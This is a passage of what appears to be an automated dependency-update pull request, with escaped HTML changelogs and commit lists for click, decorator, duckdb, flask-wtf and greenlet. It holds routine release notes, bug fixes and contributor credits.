private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n:pr:\u003ccode\u003e3372\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e typing improvements. :pr:\u003ccode\u003e2805\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\n:issue:\u003ccode\u003e2745\u003c/code\u003e :pr:\u003ccode\u003e3364\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAuto-detect \u003ccode\u003etype=UNPROCESSED\u003c/code\u003e for \u003ccode\u003eflag_value\u003c/code\u003e of non-basic types\n(not \u003ccode\u003estr\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e, \u003ccode\u003efloat\u003c/code\u003e, or \u003ccode\u003ebool\u003c/code\u003e), so programmer-provided\nPython objects like classes and enum members are passed through unchanged\ninstead of being stringified. Previously \u003ccode\u003etype=click.UNPROCESSED\u003c/code\u003e had\nto be set explicitly. :issue:\u003ccode\u003e2012\u003c/code\u003e :pr:\u003ccode\u003e3363\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6eeb50e948ea136db145280f6f5dd52eca3fa7e5\"\u003e\u003ccode\u003e6eeb50e\u003c/code\u003e\u003c/a\u003e release version 8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/67921d5b71584112eebcbf89596b5f0e6d14c49f\"\u003e\u003ccode\u003e67921d5\u003c/code\u003e\u003c/a\u003e change log and doc fixes (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3495\"\u003e#3495\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/9c41f46a4015700489ad009266edf1f3893d01d1\"\u003e\u003ccode\u003e9c41f46\u003c/code\u003e\u003c/a\u003e Fix changelog and version admonitions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6cb34774f20598aa288332f8da02c5aee85448a6\"\u003e\u003ccode\u003e6cb3477\u003c/code\u003e\u003c/a\u003e fix skip condition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/5ee8e3123d8ddece6c47eff9a7a7d4ca478c4f37\"\u003e\u003ccode\u003e5ee8e31\u003c/code\u003e\u003c/a\u003e fix I/O operation on closed file error with CliRunner and echo_via_pager (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3482\"\u003e#3482\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/becbde5cf416441627f779e8dd34e57738ee1c1f\"\u003e\u003ccode\u003ebecbde5\u003c/code\u003e\u003c/a\u003e pager doesn't close std streams\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/a5f5aa6d4012d256ccca24638f2642fc371e9f77\"\u003e\u003ccode\u003ea5f5aa6\u003c/code\u003e\u003c/a\u003e Handle empty bytes in echo (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3493\"\u003e#3493\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/4d3db84b251518e97299a38a5ca4bab3d01873a2\"\u003e\u003ccode\u003e4d3db84\u003c/code\u003e\u003c/a\u003e handle empty bytes in echo\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/d42f15b71757de791a5781fb179fd972da9169f5\"\u003e\u003ccode\u003ed42f15b\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eget_parameter_source()\u003c/code\u003e during type conversion and eager callbacks (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/0baa8db07736fc7ad3d3eed97d4c73b0059c63e1\"\u003e\u003ccode\u003e0baa8db\u003c/code\u003e\u003c/a\u003e Document ctx.params bypass with test and doc\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/click/compare/8.3.2...8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `decorator` from 5.2.1 to 5.3.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micheles/decorator/blob/master/CHANGES.md\"\u003edecorator's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.3.1 (2026-05-18)\u003c/h2\u003e\n\u003cp\u003eAdded license SPDX identifier to pyproject.toml (reported by\nChristian Lackas).\u003c/p\u003e\n\u003ch2\u003e5.3.0 (2026-05-17)\u003c/h2\u003e\n\u003cp\u003eAdded official support for Python 3.14 (thanks to Hugo van Kemenade,\nDavid Cain and the GitHub user bersbersbers).\nFixed a bug with \u0026quot;return await\u0026quot; contributed by Kadir Can Ozden.\nMoved decorator.py to a package structure (\u003ccode\u003edecorator/__init__.py\u003c/code\u003e) and\nadded a stub file (\u003ccode\u003edecorator/__init__.pyi\u003c/code\u003e) contributed by Marco Gorelli.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/426e9e35d563ffe356e54bd0f970d153b8f25370\"\u003e\u003ccode\u003e426e9e3\u003c/code\u003e\u003c/a\u003e Bumped the version to 5.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/062ff0e0c33733f2148a5590d118a8570df846d5\"\u003e\u003ccode\u003e062ff0e\u003c/code\u003e\u003c/a\u003e Fixed the dependency on setuptools\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/086ff5d95d4dc550117c12647a4427d70bf8833d\"\u003e\u003ccode\u003e086ff5d\u003c/code\u003e\u003c/a\u003e Updated license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/5807a83ead31f0de5303fa950ddea49d850d7355\"\u003e\u003ccode\u003e5807a83\u003c/code\u003e\u003c/a\u003e Updated license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/093aced11439251e496b47a9a9369501075e8d1a\"\u003e\u003ccode\u003e093aced\u003c/code\u003e\u003c/a\u003e Updated changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/e9ced7e63ad9502b3e2a3e3db5f5f1ccc16c5fd6\"\u003e\u003ccode\u003ee9ced7e\u003c/code\u003e\u003c/a\u003e Added license SPDX\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/b3e82ddc04e8d0c18c51eecb30b4a59aee5aac1d\"\u003e\u003ccode\u003eb3e82dd\u003c/code\u003e\u003c/a\u003e Fixed CHANGES.md [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/f1ce8da8522193421436c368849afe886666b4e5\"\u003e\u003ccode\u003ef1ce8da\u003c/code\u003e\u003c/a\u003e Doc fix [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/c924d7c6aa2e47a0627706c385101ff8d558d091\"\u003e\u003ccode\u003ec924d7c\u003c/code\u003e\u003c/a\u003e Updated supported versions [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/8b83e8cca35f5c773654ce4ae89b4e3f84f430d3\"\u003e\u003ccode\u003e8b83e8c\u003c/code\u003e\u003c/a\u003e Fixed CHANGES [ci skip]\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micheles/decorator/compare/5.2.1...5.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `duckdb` from 1.5.2 to 1.5.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/duckdb/duckdb-python/releases\"\u003educkdb's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.5.3 Bugfix Release\u003c/h2\u003e\n\u003cp\u003eSee the DuckDB core release notes here: \u003ca href=\"https://github.com/duckdb/duckdb/releases/tag/v1.5.3\"\u003ehttps://github.com/duckdb/duckdb/releases/tag/v1.5.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eWhat's Changed in DuckDB Python\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eExport all symbols by \u003ca href=\"https://github.com/evertlammerts\"\u003e\u003ccode\u003e@​evertlammerts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/pull/445\"\u003educkdb/duckdb-python#445\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix concjunction OR by \u003ca href=\"https://github.com/evertlammerts\"\u003e\u003ccode\u003e@​evertlammerts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/pull/465\"\u003educkdb/duckdb-python#465\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse recursive mutex to deal with GIL \u0026lt;-\u0026gt; internal lock deadlocks by \u003ca href=\"https://github.com/evertlammerts\"\u003e\u003ccode\u003e@​evertlammerts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/pull/462\"\u003educkdb/duckdb-python#462\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow self-joining of Polars lazyframes by \u003ca href=\"https://github.com/evertlammerts\"\u003e\u003ccode\u003e@​evertlammerts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/pull/466\"\u003educkdb/duckdb-python#466\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/duckdb/duckdb-python/compare/v1.5.2...v1.5.3\"\u003ehttps://github.com/duckdb/duckdb-python/compare/v1.5.2...v1.5.3\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/811b135ee5a0449378ab9635e0284b96485d58d6\"\u003e\u003ccode\u003e811b135\u003c/code\u003e\u003c/a\u003e DuckDB submodule pinned at v1.5.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/289bfbdc2914894ccbb41028a84abef34448126e\"\u003e\u003ccode\u003e289bfbd\u003c/code\u003e\u003c/a\u003e Bump submodule\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/f87d6d938fca2d7b1ae713396e77c86622d17e79\"\u003e\u003ccode\u003ef87d6d9\u003c/code\u003e\u003c/a\u003e Allow self-joining of Polars lazyframes (\u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/issues/466\"\u003e#466\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/c88229d86bf8e5ff266abc06cc620dc13d9d3529\"\u003e\u003ccode\u003ec88229d\u003c/code\u003e\u003c/a\u003e Allow self-joining of Polars lazyframes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/559f6af94b5c10e863b5e09b318c5c9f6d6c6dda\"\u003e\u003ccode\u003e559f6af\u003c/code\u003e\u003c/a\u003e Only disable unity builds for editable installs on OSX\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/97df04987ffd69a0c5a94b4e8802b78c0302023e\"\u003e\u003ccode\u003e97df049\u003c/code\u003e\u003c/a\u003e fix .clangd\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/fd8889e3024da05d7afe90f4e20d6b9bd2b3e9c0\"\u003e\u003ccode\u003efd8889e\u003c/code\u003e\u003c/a\u003e Use recursive mutex to deal with GIL \u0026lt;-\u0026gt; internal lock deadlocks (\u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/issues/462\"\u003e#462\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/7b77328d1bbcf1a95726c332a47eb8ca817222c4\"\u003e\u003ccode\u003e7b77328\u003c/code\u003e\u003c/a\u003e [duckdb-labs bot] Bump DuckDB submodule (\u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/issues/464\"\u003e#464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/9a866338302f8b7d31acde303cec9e3238cb2874\"\u003e\u003ccode\u003e9a86633\u003c/code\u003e\u003c/a\u003e Fix concjunction OR (\u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/issues/465\"\u003e#465\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/3d778deea42aab1eccce0693538805b9d6183b44\"\u003e\u003ccode\u003e3d778de\u003c/code\u003e\u003c/a\u003e Fix concjunction OR\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/duckdb/duckdb-python/compare/v1.5.2...v1.5.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask-wtf` from 1.2.2 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets-eco/flask-wtf/releases\"\u003eflask-wtf's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epre-commit autoupdate by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/607\"\u003epallets-eco/flask-wtf#607\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eremove slsa provenance by \u003ca href=\"https://github.com/davidism\"\u003e\u003ccode\u003e@​davidism\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/638\"\u003epallets-eco/flask-wtf#638\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport for Python 3.14 by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/648\"\u003epallets-eco/flask-wtf#648\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTry not to read uploaded files into memory by \u003ca href=\"https://github.com/Zverik\"\u003e\u003ccode\u003e@​Zverik\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/635\"\u003epallets-eco/flask-wtf#635\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMigrate the project to uv by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/649\"\u003epallets-eco/flask-wtf#649\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReCaptcha field testing mode documentation by \u003ca href=\"https://github.com/OmeirP\"\u003e\u003ccode\u003e@​OmeirP\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/650\"\u003epallets-eco/flask-wtf#650\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow nonce in reCaptcha by \u003ca href=\"https://github.com/kesara\"\u003e\u003ccode\u003e@​kesara\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/312\"\u003epallets-eco/flask-wtf#312\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCSRF meta tag helper by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/674\"\u003epallets-eco/flask-wtf#674\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ewidget support the kwargs to add custom html attributes by \u003ca href=\"https://github.com/thivolle-cazat-cedric\"\u003e\u003ccode\u003e@​thivolle-cazat-cedric\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/353\"\u003epallets-eco/flask-wtf#353\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRespect exempts in CSRFProtect.protect() by \u003ca href=\"https://github.com/rauchy\"\u003e\u003ccode\u003e@​rauchy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/419\"\u003epallets-eco/flask-wtf#419\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdding RECAPTCHA_ENABLE to disable recaptcha by \u003ca href=\"https://github.com/rnt\"\u003e\u003ccode\u003e@​rnt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/509\"\u003epallets-eco/flask-wtf#509\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove CSRF Documentation by \u003ca href=\"https://github.com/israel-oye\"\u003e\u003ccode\u003e@​israel-oye\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/584\"\u003epallets-eco/flask-wtf#584\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Zverik\"\u003e\u003ccode\u003e@​Zverik\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/635\"\u003epallets-eco/flask-wtf#635\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/OmeirP\"\u003e\u003ccode\u003e@​OmeirP\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/650\"\u003epallets-eco/flask-wtf#650\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kesara\"\u003e\u003ccode\u003e@​kesara\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/312\"\u003epallets-eco/flask-wtf#312\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thivolle-cazat-cedric\"\u003e\u003ccode\u003e@​thivolle-cazat-cedric\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/353\"\u003epallets-eco/flask-wtf#353\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rauchy\"\u003e\u003ccode\u003e@​rauchy\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/419\"\u003epallets-eco/flask-wtf#419\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rnt\"\u003e\u003ccode\u003e@​rnt\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/509\"\u003epallets-eco/flask-wtf#509\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/israel-oye\"\u003e\u003ccode\u003e@​israel-oye\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/584\"\u003epallets-eco/flask-wtf#584\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pallets-eco/flask-wtf/compare/v1.2.2...v1.3.0\"\u003ehttps://github.com/pallets-eco/flask-wtf/compare/v1.2.2...v1.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets-eco/flask-wtf/blob/main/docs/changes.rst\"\u003eflask-wtf's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 1.3.0\u003c/h2\u003e\n\u003cp\u003eReleased 2026-04-23\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDon't read the whole uploaded files to know their size. :pr:\u003ccode\u003e635\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eStop support for Python 3.9. Start support for Python 3.14. :pr:\u003ccode\u003e648\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMigrate the project to uv. :pr:\u003ccode\u003e649\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAllow setting a \u003ccode\u003enonce\u003c/code\u003e on :class:\u003ccode\u003e~flask_wtf.recaptcha.RecaptchaField\u003c/code\u003e\n(string or zero-argument callable) for nonce-based Content Security\nPolicies. :pr:\u003ccode\u003e312\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003ecsrf_meta_tag()\u003c/code\u003e helper and \u003ccode\u003eWTF_CSRF_META_NAME\u003c/code\u003e setting to render\nthe CSRF token as an HTML \u003ccode\u003e\u0026lt;meta\u0026gt;\u003c/code\u003e tag.\u003c/li\u003e\n\u003cli\u003eForward keyword arguments passed to the reCAPTCHA widget as HTML attributes\non the captcha \u003ccode\u003e\u0026lt;div\u0026gt;\u003c/code\u003e, with the field id used as a default \u003ccode\u003eid\u003c/code\u003e.\n:pr:\u003ccode\u003e353\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eapply_exemptions\u003c/code\u003e parameter to\n:meth:\u003ccode\u003e~flask_wtf.csrf.CSRFProtect.protect\u003c/code\u003e so \u003ccode\u003e@csrf.exempt\u003c/code\u003e keeps working\nwhen validation is triggered manually. :pr:\u003ccode\u003e419\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eRECAPTCHA_ENABLED\u003c/code\u003e setting. :pr:\u003ccode\u003e509\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/63eb4d3bd55735fc136bdc6f23a90ca2b220b602\"\u003e\u003ccode\u003e63eb4d3\u003c/code\u003e\u003c/a\u003e chore: bump to v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/192ece3da0d98682c13e12574d7b1fc938bdd8e8\"\u003e\u003ccode\u003e192ece3\u003c/code\u003e\u003c/a\u003e Improve CSRF Documentation (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/584\"\u003e#584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/1f8522d4a362ee66ab12a1ebf55379501dfcef0d\"\u003e\u003ccode\u003e1f8522d\u003c/code\u003e\u003c/a\u003e Adding RECAPTCHA_ENABLE to disable recaptcha (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/509\"\u003e#509\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/64b9215be16dc123f7eb187494dbba6bd0e5c2cd\"\u003e\u003ccode\u003e64b9215\u003c/code\u003e\u003c/a\u003e Respect exempts in CSRFProtect.protect() (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/419\"\u003e#419\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/adf674f80c5c5e55c050729e3ec086b4d6cb0f26\"\u003e\u003ccode\u003eadf674f\u003c/code\u003e\u003c/a\u003e widget support the kwargs to add custom html attributes (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/353\"\u003e#353\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/ea1f797112f857c783dcd2c6e3954357df8e1bb7\"\u003e\u003ccode\u003eea1f797\u003c/code\u003e\u003c/a\u003e feat: CSRF meta tag helper (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/674\"\u003e#674\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/412e3efda3703b141ca75afbcbf0538a7797b713\"\u003e\u003ccode\u003e412e3ef\u003c/code\u003e\u003c/a\u003e Allow nonce in reCaptcha (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/312\"\u003e#312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/a7b764a1fa8f4ea960d81104c364a2d29429e1b8\"\u003e\u003ccode\u003ea7b764a\u003c/code\u003e\u003c/a\u003e ReCaptcha field testing mode documentation (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/c053c0ec11560e68e558636962bbec1115a7ae2a\"\u003e\u003ccode\u003ec053c0e\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump pytest from 9.0.1 to 9.0.3 (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/673\"\u003e#673\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/ca2216cdf72717aa3c2355ba5f454080c78d9273\"\u003e\u003ccode\u003eca2216c\u003c/code\u003e\u003c/a\u003e chore(deps): bump uv from 0.9.11 to 0.11.6 (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/672\"\u003e#672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets-eco/flask-wtf/compare/v1.2.2...v1.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `greenlet` from 3.3.2 to 3.5.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-greenlet/greenlet/blob/master/CHANGES.rst\"\u003egreenlet's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e3.5.1 (2026-05-20)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdd preliminary support for 